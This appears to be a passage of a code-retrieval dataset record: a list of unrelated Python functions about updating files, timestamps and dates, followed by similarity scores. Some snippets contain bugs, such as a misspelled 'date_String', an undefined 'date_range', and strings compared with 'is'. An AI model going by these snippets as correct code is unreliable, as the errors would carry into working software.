self._updated_date = updated_date", "def test_files(self):\r\n\r\n for path in self.get_files():\r\n self.assertTrue(datetime.fromtimestamp(os.path.getmtime(path)) > self.start_time,\r\n msg='File not recently modified: %s' % os.path.basename(path))", "def updateCodeFiles(self):\n # if this annoying slow, could probably drop to bash or soemthing\n # for a search/replace\n for filename, filetype in self._get_code_files():\n lines = open(filename).readlines()\n found_version_line = False\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename)\n elif filetype is 'PyRex':\n lines, write_out = self._update_pyrex_file(lines, filename)\n elif filetype is 'C':\n lines, write_out = self._update_c_file(lines, filename)\n else:\n raise TypeError, \"Unknown code file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def 
update(**kwargs):\n\n def validate_valid_format(date):\n err_msg = \"date not in valid format, use YYYY-MM-DD\"\n\n # check if date is in valid format, YYYY-MM-DD\n # raise Exception if not\n date_s = date.split(\"-\")\n if not len(date_s) == 3:\n raise Exception(err_msg)\n year, month, day = date_s\n year_p = re.compile(\"\\d{4}\")\n month_day_p = re.compile(\"\\d{2}\")\n v_components = [\n {\"val\": year, \"pattern\": year_p},\n {\"val\": month, \"pattern\": month_day_p},\n {\"val\": day, \"pattern\": month_day_p}\n ]\n for v_component in v_components:\n value, pattern = [v_component[k] for k in [\"val\", \"pattern\"]]\n if not pattern.search(value):\n raise Exception(err_msg)\n \n # create a date object from the provided date, if it is older than\n # the oldest accepted time, do not update and raise Exception\n d = datetime.date(int(year), int(month), int(day))\n oldest_date_string = \\\n parse_checkpoint_ini()[\"refget_ena_checkpoint\"][\"absolute_start\"]\n oldest_date = datetime.date(\n *[int(a) for a in oldest_date_string.split(\"-\")]\n )\n\n if d < oldest_date:\n raise Exception(\"cannot update date, proposed date must be after \"\n + oldest_date_string)\n\n try:\n # get date string and validate, if OK, set the config value to\n # the proposed date and write to config file\n date_string = kwargs[\"date\"]\n validate_valid_format(date_string)\n config = parse_checkpoint_ini()\n config[\"refget_ena_checkpoint\"][\"run_start\"] = date_string\n with open(get_checkpoint_path(), \"w\") as configfile:\n config.write(configfile)\n print(\"ena checkpoint updated to \" + date_string + \". execute \"\n + \"'ena-refget-scheduler checkpoint view' to confirm\")\n \n except Exception as e:\n print(e)", "def touched_files(self, parent):", "def update_freq_dist(filename):\r\n pass", "def DateModified(filepath, stringformat=False):\n time_in_s = os.path.getmtime(filepath)\n if stringformat:\n return time.ctime(time_in_s)\n else:\n return time_in_s", "def updateDocFiles(self):\n for filename, filetype in self._get_doc_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n \n if filename.endswith('conf.py'):\n lines, write_out = self._update_doc_conf_file(lines, filename)\n else:\n raise TypeError, \"Unknown doc file type: %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def _file_update(self, filename):\n values = TaskInfo._parse_file(filename)\n self._load_dict(values)", "def updateBaseFiles(self):\n for filename, filetype in self._get_base_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename) \n elif filetype is 'Properties':\n lines, write_out = self._update_properties_file(lines,filename)\n else:\n raise TypeError, \"Unknown base file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def update(*args):", "def _update_direct(self, filename, timestamp, values, defer=None):\n\n if defer is None:\n defer = self._defer\n\n doupdate = lambda: super(RRDTwistedAPI, self).update(\n filename, timestamp, values)\n if not defer:\n doupdate()\n else:\n return threads.deferToThread(doupdate)", "def rename_date_formats(files_list):\n\n count_renamed = 0\n count_skipped = 0\n\n for file in files_list:\n\n # finding DD-DD-DDDD matches\n if date_regex.search(file):\n date_format = date_regex.search(file).group()\n date_split = date_format.split(\"-\")\n\n # detecting MM-DD-YYYY 
format and renaming to DD-MM-YYYY format\n if 1 <= int(date_split[0]) <= 12 and 1 <= int(date_split[1]) <= 31:\n european_format_date = \"-\".join([date_split[1], date_split[0], date_split[2]])\n new_file_name = file.replace(date_format, european_format_date)\n\n # checking that newly renamed file won't be a duplicate\n if new_file_name not in files_list:\n shutil.move(file, new_file_name)\n print(f\"<{file}> renamed to <{new_file_name}>\")\n count_renamed += 1\n else:\n print(f\"Cannot rename <{file}> because file <{new_file_name}> already exists\")\n count_skipped += 1\n\n # for files with DD-DD-DDDD format, but not MM-DD-YYYY like 89-77-3445\n else:\n print(f\"<{file}> has no MM-DD-YYYY date in name\")\n count_skipped += 1\n\n # for files with no MM-DD-YYYY format like 12-1221.txt or text.pdf\n else:\n print(f\"<{file}> has no MM-DD-YYYY date in name\")\n count_skipped += 1\n\n print(f\"\\nSUMMARY:\\nRenamed files count - {count_renamed}, not affected files count - {count_skipped}.\")", "def update(self, paths):\n raise NotImplementedError", "def format_finder(files):\r\n\r\n file_format = ['%Y', '%m', '%d']\r\n year = ''\r\n month = ''\r\n da = ''\r\n\r\n for file in files:\r\n\r\n index = file.find('_')\r\n date = file[: index]\r\n if '-' in date:\r\n separator = '-'\r\n else:\r\n separator = '_'\r\n date = date.split(separator)\r\n\r\n for d in range(len(date)):\r\n\r\n # If the date doesn't contain decimal (Eg: August) then it would return None\r\n if not date[d].isdecimal():\r\n return None\r\n\r\n # If the element in the date is of length greater then 2 then it would be a year (Eg: 2020)\r\n # And that value is set as the index of year\r\n if len(date[d]) > 2:\r\n year = d\r\n\r\n # If the integer of element in the date is of length greater then 12 then it would be a date (Eg: 25)\r\n # And that value is set as the index of date\r\n elif int(date[d]) > 12:\r\n da = d\r\n\r\n # If Both year and date are set, then the correct index for the month would be 3- (year+date)\r\n # Eg: 3 -(0+1)\r\n if (year != '') and (da != ''):\r\n month = 3 - (year + da)\r\n break\r\n\r\n # If Month is set, then we change the format according to their set value\r\n # Eg: format = ['%Y', '%m', '%d'], and year = 1, da = 0, month = 2\r\n # Then format[year=1] = '%Y'\r\n # Then format[da=0] = '%d'\r\n # Then format[month=2] = '%m'\r\n # format = ['%d', '%Y', '%m']\r\n if month:\r\n file_format[year] = '%Y'\r\n file_format[month] = '%m'\r\n file_format[da] = '%d'\r\n break\r\n else:\r\n # The script executes this only if none of the files had an date element( Which is not year)\r\n # That was greater than 12, Eg: 2020-06-10\r\n # Meaning that we cannot know for sure which element represents the date/month\r\n # Hence we arbitrarily assign one element as date and another as month\r\n if year != 0:\r\n # If the index of year is zero, we let the format to be same as it was assigned first\r\n # Else we arbitrarily assign '0' th index to month\r\n file_format[year] = '%Y'\r\n file_format[0] = '%m'\r\n file_format[3 - year] = '%d'\r\n return f'{file_format[0]}-{file_format[1]}-{file_format[2]}'", "def update( ):\r\n pass", "def change_modified_date(sbml):\n history = sbml.getModel().getModelHistory()\n if history:\n history.setModifiedDate(libsbml.Date(w3c_time()))\n # remove all but final modified date\n while history.getListModifiedDates().getSize() > 1:\n history.getListModifiedDates().remove(0)", "def up_to_date(db, args, pattern):\n\n any_out_of_date = False\n num_found_files = 0\n for arg in args:\n 
find_data = None\n try:\n find_data = eugene_sys.FindFiles(pattern(arg))\n\n num_found_files = num_found_files+len(find_data)\n except ValueError:\n #print(f\"couldn't open directory {arg} or no suitable files found within...\")\n continue\n\n for file in find_data:\n key = file['cFileName']\n record = file['ftLastWriteTime']\n\n if db.compareWithRecord(key, record): continue # Up-to-date\n\n db_record = db.readRecord(key)\n db.writeRecord(key, record)\n\n old = eugene_sys.GetDateTimeFormat(db_record) if db_record > 0 else \"(null)\"\n new = eugene_sys.GetDateTimeFormat(record)\n\n msg = f\"`{key}' not up to date\"\n msg += _PAD[len(msg):]\n\n print(f\"{msg} ({old} -> {new})...\")\n any_out_of_date = True\n\n # For the query to return a 'True' result\n # - No database record can be out-of-date\n # - At LEAST one file in the directories\n # given in 'args' must've matched the\n # pattern\n result = (num_found_files > 0) and not any_out_of_date\n\n if result: print(\" ...up to date!\")\n return result", "def change_files(self, files: list = None):\n if not is_empty_arr(files):\n self._files = files", "def _date(self, _date):\n\n self.__date = _date", "def _date(self, _date):\n\n self.__date = _date", "def update_version_files (component):\n\n vprint (\"Updating version files for \" + component)\n\n retval = []\n\n ## Update component/VERSION.txt\n path = get_path(component, \"VERSION.txt\")\n with open (path, \"r+\") as version_file:\n new_version = re.sub (component + \" version .*\",\n \"%s version %s, released %s\" % (component,\n comp_versions[component + \"_version\"],\n release_date),\n version_file.read ())\n if opts.take_action:\n version_file.seek (0)\n version_file.truncate (0)\n version_file.write (new_version)\n else:\n print (\"New version file for \" + component)\n print (new_version)\n\n vprint (\"Updating Version.h for \" + component)\n\n retval.append(path)\n\n ## Update COMPONENT/component/Version.h\n comp_l = len(component + \"_\")\n parts = {k[comp_l:]:v for (k, v) in comp_versions.items() if k.startswith(component)}\n parts[\"comp\"] = component\n version_header = \"\"\"\n// -*- C++ -*-\n// This is file was automatically generated by $ACE_ROOT/bin/make_release.py\n\n#define {comp}_MAJOR_VERSION {major}\n#define {comp}_MINOR_VERSION {minor}\n#define {comp}_MICRO_VERSION {micro}\n#define {comp}_VERSION \\\"{version}\\\"\n#define {comp}_VERSION_CODE 0x{code:x}\n#define {comp}_MAKE_VERSION_CODE(a,b,c) (((a) << 16) + ((b) << 8) + (c))\n\"\"\".format(**parts)\n\n path = get_path(component, component.lower (), \"Version.h\")\n if opts.take_action:\n with open (path, 'w+') as version_h:\n version_h.write (version_header)\n else:\n print (\"New Version.h for \" + component)\n print (version_header)\n\n retval.append(path)\n\n # Update component/PROBLEM-REPORT-FORM\n vprint (\"Updating PRF for \" + component)\n\n version_line_re = re.compile (r\"^\\s*(\\w+) +VERSION ?:\")\n path = get_path(component, \"PROBLEM-REPORT-FORM\")\n\n with open (path, 'r+') as prf:\n new_prf = \"\"\n for line in prf.readlines ():\n match = version_line_re.search (line)\n if match is not None:\n vprint (\"Found PRF Version for \" + match.group (1))\n new_version = comp_versions[match.group(1) + \"_version\"]\n line = version_re.sub (new_version, line)\n\n new_prf += line\n\n if opts.take_action:\n prf.seek (0)\n prf.truncate (0)\n prf.writelines (new_prf)\n else:\n print (\"New PRF for \" + component)\n print (\"\".join (new_prf))\n\n retval.append(path)\n\n return retval", "def date(self, new_date):\n 
self._date.date = new_date", "def process_single_date(self, input_filepath):\n # first see if there are already files in the output location\n # (in which case we can skip this date)\n\n # normally the coordinates will be part of the file path\n coords_string = find_coords_string(input_filepath)\n # if not though, we might have coords set explicitly\n if (not coords_string) and \"coords\" in vars(self):\n coords_string = \"{}_{}\".format(self.coords[0],self.coords[1])\n date_string = input_filepath.split(\"/\")[-2]\n if not re.search(\"[\\d]{4}-[\\d]{2}-[\\d]{2}\", date_string):\n if date_range in vars(self):\n date_string = fid_mid_period(self.date_range[0], self.date_range[1])\n else:\n date_String = None\n if not coords_string and date_string:\n raise RuntimeError(\"{}: coords and date need to be defined, through file path or explicitly set\")\n\n output_location = os.path.dirname(self.construct_image_savepath(date_string,\n coords_string))\n if (not self.replace_existing_files) and \\\n self.check_for_existing_files(output_location, self.num_files_per_point):\n return True\n \n print(\"Proceeding.\")\n print(input_filepath)\n print(self.input_location_type)\n \n # If no files already there, proceed.\n filenames = [filename for filename in self.list_directory(input_filepath,\n self.input_location_type) \\\n if filename.endswith(\".tif\")]\n\n # extract this to feed into `convert_to_rgb()`\n band_dict = {}\n for icol, col in enumerate('rgb'):\n band = self.RGB_bands[icol]\n filename = self.get_file(os.path.join(input_filepath,\n \"download.{}.tif\".format(band)),\n self.input_location_type)\n band_dict[col] = {\"band\": band,\n \"filename\": filename\n }\n\n print(filenames)\n tif_filebase = os.path.join(input_filepath, filenames[0].split('.')[0])\n\n # save the rgb image\n rgb_ok = self.save_rgb_image(band_dict,\n date_string,\n coords_string)\n if not rgb_ok:\n print(\"Problem with the rgb image?\")\n return False\n\n # save the NDVI image\n ndvi_tif = self.get_file(os.path.join(input_filepath,\n \"download.NDVI.tif\"),\n self.input_location_type)\n ndvi_image = scale_tif(ndvi_tif)\n ndvi_filepath = self.construct_image_savepath(date_string,\n coords_string,\n 'NDVI')\n self.save_image(ndvi_image,\n os.path.dirname(ndvi_filepath),\n os.path.basename(ndvi_filepath))\n\n # preprocess and threshold the NDVI image\n processed_ndvi = process_and_threshold(ndvi_image)\n ndvi_bw_filepath = self.construct_image_savepath(date_string,\n coords_string,\n 'BWNDVI')\n self.save_image(processed_ndvi,\n os.path.dirname(ndvi_bw_filepath),\n os.path.basename(ndvi_bw_filepath))\n\n # split and save sub-images\n self.split_and_save_sub_images(ndvi_image,\n date_string,\n coords_string,\n \"NDVI\")\n\n self.split_and_save_sub_images(processed_ndvi,\n date_string,\n coords_string,\n \"BWNDVI\")\n\n return True", "def check_auto_update(self):\n\n # pylint: disable=W0201\n\n if self.filename is None:\n return\n try:\n filename = self.filename\n timestamp = os.stat(self.filename).st_mtime\n if self.timestamp is None or self.timestamp < timestamp:\n logger.debug(\"Updating %s, timestamp %s\",\n filename, rpki.sundial.datetime.fromtimestamp(timestamp))\n f = open(filename, \"rb\")\n value = f.read()\n f.close()\n self.clear()\n if looks_like_PEM(value):\n self._set_PEM(value)\n else:\n self.DER = value\n self.filename = filename\n self.timestamp = timestamp\n except (IOError, OSError), e:\n now = rpki.sundial.now()\n if self.lastfail is None or now > self.lastfail + self.failure_threshold:\n 
logger.warning(\"Could not auto_update %r (last failure %s): %s\", self, self.lastfail, e)\n self.lastfail = now\n else:\n self.lastfail = None", "def update_source_files(source_directory_list, source_extension_list):\n # get source files in the directory list\n source_total = 0\n for unused, source_directory in enumerate(source_directory_list):\n source_files_list = []\n get_requested_files(source_directory, source_extension_list, source_files_list)\n # update the files with shared object references\n for unused, source_file in enumerate(source_files_list):\n updated_file = []\n file_changed = modify_input_file(source_file, updated_file)\n if file_changed:\n filepath = get_printble_filepath(source_file)\n print(filepath)\n source_total += 1\n if __file_update:\n write_output_file(updated_file, source_file)\n print(\"Total Files\", source_total)\n print()", "def update_args_with_file(files, args):\n args['files'] = {}\n for file_name in files:\n file = files[file_name]\n filename = file.filename\n args['files'][file_name] = filename\n return args", "def updateCache(self):\n for root, dirs, files in os.walk(cachedFilesPath):\n for file in files:\n if file.endswith(cachedFileExtensionSuffix):\n path = os.getcwd()+'/'+cachedFilesPath+file\n with open(path, mode='r') as f:\n payload_json = f.read()\n payload_obj=jsonpickle.decode(payload_json)\n r= self.upload(payload_obj)\n if isinstance(r, types.NoneType):\n #do nothing\n print(\"\")\n else:\n if r.status_code == 200 :\n #uploaded!\n if cacheArhive:\n #move it to archive\n dst=os.getcwd()+'/'+cachedArchivePath+file\n shutil.move(path, dst)\n print(\"archived log: \", file)\n else:\n #delete it\n os.remove(path)", "def _set_date(line, dirtydate, date):\n line = re.sub(dirtydate, date, line, 2)\n return line", "def update_timestamp():\n\n with open(\"timestamp.data\", \"r+\") as file:\n old = float(file.read())\n now = time.mktime(datetime.datetime.now().timetuple())\n file.seek(0)\n file.write(str(now))\n file.truncate()\n return old", "def update_files(self):\n try:\n db_files = self.dbc.get_file_list(self.remote_directory)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) \\\n + \": Could not get remote file list.\"\n print e.reason\n return False\n new_files = set(db_files) - self.file_set\n old_files = self.file_set - set(db_files)\n if new_files != set() or old_files != set():\n self.file_set = set(db_files)\n for filename in new_files:\n try:\n self.dbc.get_file(filename)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) + e.reason\n for filename in old_files:\n try:\n os.remove(self.local_directory + \"/\" + filename)\n except OSError:\n pass\n print str(datetime.datetime.now()) + \": Fileset changed:\"\n print self.file_set\n email_changes(new_files, old_files)\n print str(datetime.datetime.now()) \\\n + \": Email sent from update_files().\"\n return True\n return False", "def update():", "def update():", "def setDate(self, p_int, p_int_1, p_int_2): # real signature unknown; restored from __doc__\r\n return False", "def updateFileData(self):\n with open(pagePath(self.pageName)) as f:\n self.fileData = f.read()\n self.lastUpdated = time.time()", "def updatePullDate(self):\n self.startTime = datetime.now()", "def update_field_date(self, fieldid, name, namespace, require, modify, check, fill, remark):\n return self.mongo.db.userfield.update(\n {\n \"fields._id\":ObjectId(fieldid)\n },\n {\n '$set':\n {\n 'fields.$.name':name,\n 'fields.$.namespace':namespace,\n 
'fields.$.require':bool(int(require)),\n 'fields.$.modify':bool(int(modify)),\n 'fields.$.check':bool(int(check)),\n 'fields.$.fill':bool(int(fill)),\n 'fields.$.remark':remark,\n }\n })", "def time_stamping(file):\n time_stamp = datetime.now().date()\n\n # 1st remove path like /home/\n path_file = file.split(\"/\")\n # 2nd removes file formats\n file_ = path_file[len(path_file)-1].split(\".\", 1)\n path_file.pop()\n # 3rd add time_stamp\n file_[0] = str(file_[0])+\"_\"+str(time_stamp)\n # 4th all is back together\n file = '.'.join(map(str, file_))\n\n path_file.append(file)\n file = '/'.join(map(str, path_file))\n print(file)\n return file", "def refresh(self):\n \n ffm = FlagFileManager(basedir=self.basedir)\n flagfiles = ffm.search(projectname=self.projectname)\n if flagfiles:\n self.tag = flagfiles[0].tag # we assume only 1 flagfile per project\n self.filename = '%s.%s.%s' %(self.projectname, self.timestamp, self.tag)", "def on_file_changed(self, path):\n\t\tpass", "def file_creation_date(file_path):\n ran_command = run_command([\"stat\", \"-f\", \"%SB\", file_path], True)\n raw_command_output = get_subprocess_output(ran_command)\n command_output = raw_command_output.strip(\"\\\\n\")\n elements = command_output.split(\" \")\n month_string = elements[0]\n month_number = 0\n day_number = int(elements[1])\n year_number = int(elements[3])\n if month_string == \"January\":\n month_number += 1\n elif month_string == \"February\":\n month_number += 2\n elif month_string == \"March\":\n month_number += 3\n elif month_string == \"April\":\n month_number += 4\n elif month_string == \"May\":\n month_number += 5\n elif month_string == \"June\":\n month_number += 6\n elif month_string == \"July\":\n month_number += 7\n elif month_string == \"August\":\n month_number += 8\n elif month_string == \"September\":\n month_number += 9\n elif month_string == \"October\":\n month_number += 10\n elif month_string == \"November\":\n month_number += 11\n elif month_string == \"December\":\n month_number += 12\n return [month_number, day_number, year_number]", "def update_data(self, url, file_name):\n if file_name == 'upcoming':\n r = self.gosu\n # Thread(target=self.update_upcoming_matches_teams, args=(r,)).start()\n else:\n r = requests.get(url)\n r = r.json()\n with open('files/' + file_name + '.json', 'w') as f:\n json.dump(r, f, indent=4)\n with open('files/' + file_name + '.txt', 'w') as f_: # update date\n f_.write(str(time.time()))", "def refresh(self):\n self.dir = dirs['app']\n ssBase = GPath(mwIniFile.getSetting('General','Screen Shot Base Name','ScreenShot'))\n if ssBase.head:\n self.dir = self.dir.join(ssBase.head)\n newData = {}\n reImageExt = re.compile(r'\\.(bmp|jpg)$',re.I)\n #--Loop over files in directory\n for fileName in self.dir.list():\n filePath = self.dir.join(fileName)\n maImageExt = reImageExt.search(fileName.s)\n if maImageExt and filePath.isfile(): \n newData[fileName] = (maImageExt.group(1).lower(),filePath.mtime)\n changed = (self.data != newData)\n self.data = newData\n return changed", "def _update_subfiles(self) -> None:\n\t\t# Clear list of subfiles\n\t\tself.subfiles.clear()\n\t\t# Iterate over Nodes\n\t\tfor node in self.nodes:\n\t\t\tfor file in node.get_subfiles():\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))\n\t\t# Iterate over SubNodes\n\t\tfor subnode in self.subnodes:\n\t\t\tfor file in subnode.filenames:\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))", "def process_file(self, filepath, only_if_updated=True):\n raise 
NotImplementedError()", "def __call__(self) -> str:\n self._set_dt_format()\n self._set_dt_string()\n return self._get_filepath()", "def update(self, filename, template_dir, cache_dir):\n\t\tself.cache_dir = cache_dir\n\t\tif filename.startswith('/'): self.template_file = filename\n\t\telse: self.template_file = os.path.join(template_dir,filename)\n\t\tself.cache_module = re.sub(\"[\\/\\\\\\.: ]\",'_',os.path.realpath(self.template_file))\n\t\tself.cache_file = os.path.join(cache_dir,self.cache_module) + '.py'", "def touch(*paths):\n\n for path in paths:\n if os.path.exists(path):\n os.utime(path, None)\n else:\n open(path, 'a').close()\n LOG.debug('touch {!r}'.format(path))", "def localfiles_for_update(self, localfiles, obsfiles):\n upload_local_files = []\n obs_dict = {}\n for key, mtime, size in obsfiles:\n obs_dict[key.strip('/')] = mtime\n\n for localfile in localfiles:\n filepath, key = localfile\n fullkey = key + '/' + os.path.basename(filepath)\n fullkey = fullkey.strip('/')\n if fullkey in obs_dict.keys():\n localfile_timestamp = os.path.getmtime(filepath)\n obsfile_timestamp = time.mktime(time.strptime(obs_dict[fullkey], \"%Y/%m/%d %H:%M:%S\"))\n\n if localfile_timestamp > obsfile_timestamp:\n upload_local_files.append(localfile)\n else:\n upload_local_files.append(localfile)\n return upload_local_files", "def store_file_mtime_in(source, output_filename):\n with open(output_filename, \"w\") as mtime_file:\n mtime_file.write(str(os.stat(source).st_mtime))", "def add(self, filename, source):\n self.cache[filename] = source\n if os.path.isfile(filename):\n self.ages[filename] = os.path.getmtime(filename) # modification time", "def get_file_age_default(path, cur_parsed, cur_datetime):\n\tmtime = datetime.fromtimestamp(os.path.getmtime(path))\n\tmtime = str(mtime).split(' ')[0]\n\tmtime = parse_date_str(mtime, '-', 0, 1, 2)\n\tprint(\"file mtime: {}\".format(mtime))\n\tdate_dif = date_dif_precomputed(cur_parsed[0], cur_parsed[1], cur_parsed[2], mtime[0], mtime[1], mtime[2])\n\treturn date_dif", "def resortFiles(fileList):\n if fileList is None or not len(fileList):\n print \"SRT:nofiles in the dictionary.\"\n sys.exit()\n\n new_file_list = list()\n for f in fileList:\n new_file_list.append(PFileStat(dir_source, f, os.lstat(dir_source + \"/\" + f)))\n\n new_file_list.sort(key=lambda i: i.st_mtime)\n return new_file_list", "def update(self, dt):\n pass", "def refreshMTimes(self):\n del self.mtimesReset[:]\n for fileName, fileInfo in self.data.items():\n oldMTime = self.mtimes.get(fileName,fileInfo.mtime)\n self.mtimes[fileName] = oldMTime\n #--Reset mtime?\n if fileInfo.mtime != oldMTime and oldMTime != -1:\n fileInfo.setMTime(oldMTime)\n self.mtimesReset.append(fileName)", "def up_to_date(self, gyp_file, target=None, **kw):\n raise NotImplementedError", "def add_date(self, date):\n with open(self.data_filepath, 'a', newline='') as writef:\n writer = csv.writer(writef)\n writer.writerow([date.freeze()])\n self._file_modified = True", "def _get_files_timestamps(self, working_dir: Union[str, os.PathLike]):\n return {f: os.path.getmtime(os.path.join(working_dir, f)) for f in os.listdir(working_dir)}", "def date_setup(date, page_offset, url,c):\r\n\r\n if date <= 10:\r\n page_offset = 0\r\n url = 
\"http://data.terapeak.com/?id=0&search=1&view=item_browse&query=iphone+5s&date=2015-02-1&date_range=1&buyer_country_id=1&condition=rollup_3&type%5Bfixed%5D=1&from_start_price=100&to_start_price=800&from_end_price=100&to_end_price=800&seller_country_id=1&txn_site_id=0&numPages=12&siteID=0&offset={0}\".format(page_offset)\r\n u = list(url)\r\n new = str(date)\r\n u[86] = new #this will update the date from date=2014-09-1 to date=2014-09-2\r\n date_ed_url = \"\".join(u)\r\n #print(edited)\r\n page_offset_update(date, page_offset, date_ed_url, c) # the date has now been updated and the page_offset has been reset to 0\r\n else:\r\n with open(\"5s_Feb_2015_.csv\", \"w\", newline='', encoding='UTF-8') as f:\r\n writer = csv.writer(f)\r\n writer.writerows(listof_listof_lists)\r\n print(\"done\")\r\n quit", "def test_verify_changed_source_file_adjust_mtime(self):\n\n # Get the atime and mtime of the file\n file_info = os.stat('testfiles/various_file_types/executable')\n\n # Set the atime and mtime of the file to the time that we collected, as on some systems\n # the times from a stat call don't match what a utime will set.\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n\n # Edit source file\n with open('testfiles/various_file_types/executable', 'r+') as f:\n f.write('This changes a source file.')\n\n # Set the atime and mtime for the file back to what it was prior to the edit\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n # Test verify for the file\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable', options=[])", "def append_date_file(filename, search_str=\"----\", append_time=True, include_second=False,\n prepend=None):\n filename_final = \"\"\n if filename.find(search_str) >= 0:\n str_date, str_time = calc_date_time(include_sec=include_second)\n if append_time:\n if prepend and isinstance(prepend, str):\n filename_final = filename.replace(\n search_str, \"_\".join([prepend, str_date, str_time]))\n else:\n filename_final = filename.replace(\n search_str, \"_\".join([str_date, str_time]))\n else:\n if prepend and isinstance(prepend, str):\n filename_final = filename.replace(\n search_str, \"_\".join([prepend, str_date]))\n else:\n filename_final = filename.replace(\n search_str, str_date)\n else:\n filename_final = filename\n\n return filename_final", "def file_stat(self, file_path):", "def modified(filename: str) -> datetime.datetime:\n fs, relative_path = url_to_fs(filename)\n return cast(datetime.datetime, fs.modified(relative_path))" ]
[ "0.7073105", "0.6812823", "0.66919583", "0.6668282", "0.62575287", "0.6241051", "0.61830145", "0.6148155", "0.59413326", "0.5930518", "0.58680063", "0.5799601", "0.57853353", "0.5773595", "0.5749723", "0.57237613", "0.5706964", "0.57064885", "0.57048666", "0.56627303", "0.56627303", "0.56576204", "0.5645854", "0.56167793", "0.5600461", "0.5600461", "0.5573795", "0.557155", "0.5541764", "0.5538051", "0.55229753", "0.55177194", "0.55176914", "0.5507821", "0.55047345", "0.54638183", "0.54631966", "0.54631966", "0.54621494", "0.5451095", "0.5440372", "0.5426119", "0.5424368", "0.5395367", "0.5393714", "0.53884", "0.5388041", "0.5376307", "0.537221", "0.5362561", "0.53258765", "0.53080237", "0.5306047", "0.53035396", "0.5301897", "0.529589", "0.52952945", "0.52952945", "0.52948064", "0.5288764", "0.52886283", "0.5287184", "0.5282595", "0.52775234", "0.52747387", "0.5274722", "0.5273478", "0.52708936", "0.5265641", "0.5265641", "0.5263203", "0.5259155", "0.52537125", "0.52521235", "0.5251792", "0.5243818", "0.5242423", "0.52284735", "0.52167684", "0.5206416", "0.5205425", "0.52037543", "0.52034706", "0.5202606", "0.51992196", "0.51962286", "0.51955277", "0.51920444", "0.51902676", "0.5189365", "0.5184207", "0.5180948", "0.51808304", "0.51806957", "0.5180428", "0.5170732", "0.51653033", "0.5164557", "0.51570576", "0.51511395" ]
0.6030693
8
Test combining each center's file errors
def test__combine_center_file_errors(syn):
    expected_error = (
        f"\t{ENT1.name} ({ENT1.id}):\n\nmy errors\nn\n\n"
        f"\t{ENT1.name} ({ENT1.id}):\n\nerrors here\nf\n\n"
    )
    calls = [
        mock.call("syn1234", downloadFile=False),
        mock.call("syn2345", downloadFile=False),
    ]
    with patch.object(syn, "get", return_value=ENT1) as patch_synget:
        center_errors = write_invalid_reasons._combine_center_file_errors(
            syn, CENTER_ERRORSDF
        )
        assert center_errors == expected_error
        patch_synget.assert_has_calls(calls)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_single_error_merge(self):\n test_folder = base_path +'/test_data/merging_tests/error_test/'\n output_file = os.path.join(test_folder, \"output1.jpg\")\n\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"dummy.txt\", test_folder+\"background.jpg\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render_small.png\", test_folder+\"background.jpg\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render1.png\", test_folder+\"dummy.txt\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render1.png\", test_folder+\"background_small.jpg\", output_file))\n self.assertRaises(mi.ImageError, lambda: mi.add_background(test_folder+\"render1.png\", test_folder+\"background_large.jpg\", output_file))", "def test_get_center_invalid_errors(syn):\n with patch.object(\n syn, \"tableQuery\", return_value=QueryResponse\n ) as patch_query, patch.object(\n write_invalid_reasons, \"_combine_center_file_errors\", return_value=\"errors\"\n ) as patch_combine:\n center_invalid = write_invalid_reasons.get_center_invalid_errors(syn, \"syn3333\")\n assert center_invalid == {\"SAGE\": \"errors\", \"TEST\": \"errors\"}\n patch_query.assert_called_once_with(\"SELECT * FROM syn3333\")\n assert patch_combine.call_count == 2", "def test_strain_not_in_two_files(generate_no_strain_one_file):\n fname = generate_no_strain_one_file\n with pytest.raises(Exception):\n process_files([fname, fname])", "def generate_second_list_corrupted_files(directory):\n \n paths = [\"test\", \"dev\", \"train\"]\n corrupted_files = []\n\n for path in paths:\n files = [\n f\n for f in listdir(join(directory, path))\n if isfile(join(directory, path, f))\n ]\n\n total_files=len(files)\n processed_files = 0\n \n for file in files:\n processed_files+=1\n if \".wav\" in file: \n print(\"Checking files from \" + path + \" set \" + str(processed_files) + \"/\" + str(total_files), end=\"\\r\")\n if os.path.getsize(join(directory, path, file)) <= 0:\n corrupted_files.append(file)\n continue\n data, _ = soundfile.read(join(directory, path, file))\n if len(data) <= 0:\n corrupted_files.append(file)\n\n print()\n print(\"Done checking \" + path + \" set\")\n print(\"=====================\")\n\n with open('tuda_corrupted2.txt', 'w') as f:\n for file in corrupted_files:\n f.write(\"%s\\n\" % file)\n \n print(\"Done writing tuda_corrupted2.txt\" +\n \"Together with tuda_corrupted.txt they contain all corrupted files in Tuda-De\")\n print(\"=====================\")", "def verify_images(root_dir, root_listdir):\n counter = 0\n\n for index, image_dir in enumerate(root_listdir):\n images_listdir = os.listdir(root_dir + \"/\" + image_dir)\n list_of_images_indices = [\n image_index\n for image_index in range(3, len(images_listdir) - 1)\n if image_index % 2 == 0\n ]\n for image_ind in list_of_images_indices:\n filename = root_dir + \"/\" + image_dir + \"/\" + images_listdir[image_ind]\n try:\n im = Image.open(filename)\n im.verify()\n im.close()\n except (OSError, ValueError):\n counter += 1\n\n print(\"%d files caused error due to OSError and ValueError.\" % counter)", "def testError(self):\n cmds = \"\"\"chown 0 